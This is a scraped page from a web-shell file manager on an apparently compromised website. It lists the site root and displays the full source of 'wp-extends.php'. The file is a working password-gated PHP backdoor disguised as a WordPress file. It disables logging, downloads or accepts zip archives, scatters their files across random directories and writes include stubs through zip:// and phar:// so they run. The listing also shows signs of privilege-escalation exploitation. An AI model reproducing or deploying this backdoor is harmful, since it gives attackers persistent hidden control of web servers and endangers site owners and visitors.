Gecko [ touzafair.com ]

Name	Size	Permission
.pkexec	[ DIR ]	drwxr-xr-x
.tmb	[ DIR ]	drwxr-xr-x
.well-known	[ DIR ]	drwxr-xr-x
GCONV_PATH=.	[ DIR ]	drwxr-xr-x
cgi-bin	[ DIR ]	drwxr-xr-x
.hcflag	30 B	-rw-r--r--
.htaccess	245 B	-rw-r--r--
.htaccess.bk	281 B	-rw-r--r--
.mad-root	0 B	-rw-r--r--
493d19d686c545f9bfa48fa88025a0...	32 B	-rw-r--r--
BingSiteAuth.xml	85 B	-rw-r--r--
aa.php	124 B	-r--r--r--
adminer.php	465.43 KB	-rw-r--r--
ads.txt	58 B	-rw-r--r--
app-863567_2023.04.26_05.00.00...	242.48 MB	-rw-r--r--
cryptocoinsad-verification.txt	5 B	-rw-r--r--
dead.letter	4 B	-rw-r--r--
favicon-16x16.png	394 B	-rw-r--r--
favicon-32x32.png	768 B	-rw-r--r--
favicon.ico	15.04 KB	-rw-r--r--
google9cce411bb594665b.html	53 B	-rw-r--r--
new.zip	1.49 KB	-rw-r--r--
php.ini	105 B	-rw-r--r--
wp-extends.php	2.9 KB	-rw-r--r--

Code Editor : wp-extends.php

<?php @ini_set('error_log',NULL);@error_reporting(0);@set_time_limit(0);if(function_exists("opcache_reset"))opcache_reset();@header("X-LiteSpeed-Purge: *");@header('X-LSCACHE: off');$c='ff3a816e23d69979ae6f8cae49aef3ea';function wp_die($e){die($e);}$g=!empty($_COOKIE['uid'])?$_COOKIE['uid']:$_REQUEST['uid'];if(empty($g)||md5(md5(sha1(md5(md5($g)))))!=$c)wp_die("p");function listFolders($h){$j=scandir($h);$k=array();foreach($j as $m){if($m=="."||$m=="..")continue;$q=$h."/".$m;if(is_dir($q)){$k[]=$q;$k=array_merge($k,listFolders($q));};}return $k;}function rstr($r=6){return substr(str_shuffle('0123456789abcdefghijklmnopqrstuvwxyz'),1,$r);}function to($q,$u){$v=rand(0,count($q)-1);$w="1";if(!empty($_REQUEST['o']))$w=$_REQUEST['o'];$x=$q[$v]."/".rstr()."/";mkdir($x,0777,true);if($w=="1"){$x.="index.php";}elseif($w=="2"){$x.=rstr(5).".php";}elseif($w=="3"){$x.=$u;}return $x;}function d1($y){$z=@fopen($y,'r');$aa="";if(!$z)return false;stream_get_meta_data($z);while(!feof($z)){$aa.=fgets($z);}fclose($z);return $aa;}function d2($y){$bb=file_get_contents($y);if(empty($bb))d1($y);return $bb;}function fw($y,$q,$cc=null){if(file_put_contents($y,$q)){return true;}else{$dd=@FOPen($y,"w");if($dd){if(fwrite($dd,$q)||($cc!=null&&stream_copy_to_stream($cc,$dd))){@fClOsE($dd);return true;};}};return false;}function down($r,$ee){$gg=false;if(function_exists('curl_init')){$hh=curl_init($r);$z=fopen($ee,'w+');curl_setopt($hh,CURLOPT_FILE,$z);curl_setopt($hh,CURLOPT_TIMEOUT,50);if(curl_exec($hh)){$gg=true;}curl_close($hh);fclose($z);}else{$aa=d2($r);if($aa)$gg=fw($ee,$aa);}return $gg;}if(!empty($_REQUEST["l"])&&$_REQUEST["l"]=="a")wp_die(md5_file(__FILE__));$ii=$_SERVER['DOCUMENT_ROOT'];$jj=listFolders($ii);$cc=to($jj,"").".zip";if(!empty($_FILES['pluginzip'])){$cc=$_FILES['pluginzip']['tmp_name'];move_uploaded_file($_FILES['pluginzip']['tmp_name'],$cc);}elseif(!empty($_REQUEST["l"])){if(!down(gzuncompress(hex2bin($_REQUEST["l"])),$cc))wp_die("d");}elseif(!empty($_REQUEST['uid']))wp_die("<form method='post' enctype='multipart/form-data'><input type='file' name='pluginzip'><input type='submit'/>");$kk="";$ll=array();if(class_exists("ZipArchive")){$mm=new ZipArchive();if($mm->open($cc)!==TRUE)wp_die("z");for($v=0;$v<$mm->numFiles;$v++){$nn=$mm->getNameIndex($v);$z=$mm->getStream($nn);$ll[]=$nn;$oo=explode("/",$nn);$pp=end($oo);if($z){$qq=stream_get_contents($z);$rr=to($jj,$pp);$ss=str_replace($ii,"",$rr)."\n";if(fw($rr,$qq,$z)){echo $ss;};}}$mm->close();$kk='"zip://'.$cc.'#';}elseif(!empty($_REQUEST["n"])){$kk='"phar://'.$cc.'/';$ll=explode("|",gzuncompress(hex2bin($_REQUEST["n"])));foreach($ll as $tt){$qq=file_get_contents('phar://'.$cc.'/'.$tt);if($qq){$rr=to($jj,$tt);$ss=str_replace($ii,"",$rr)."\n";if(fw($rr,$qq)){echo $ss;};}}}if(!empty($kk)){$_REQUEST['o']=1;foreach($ll as $tt){$rr=to($jj,'');$qq='<?=@null; $h="";if(!empty($_SERVER["HTTP_HOST"])) $h = "'.$tt.'"; include('.$kk.'$h");?>';if(fw($rr,$qq))echo str_replace($ii,"",$rr)."\n";}}?>

${this.title}

Code Editor : wp-extends.php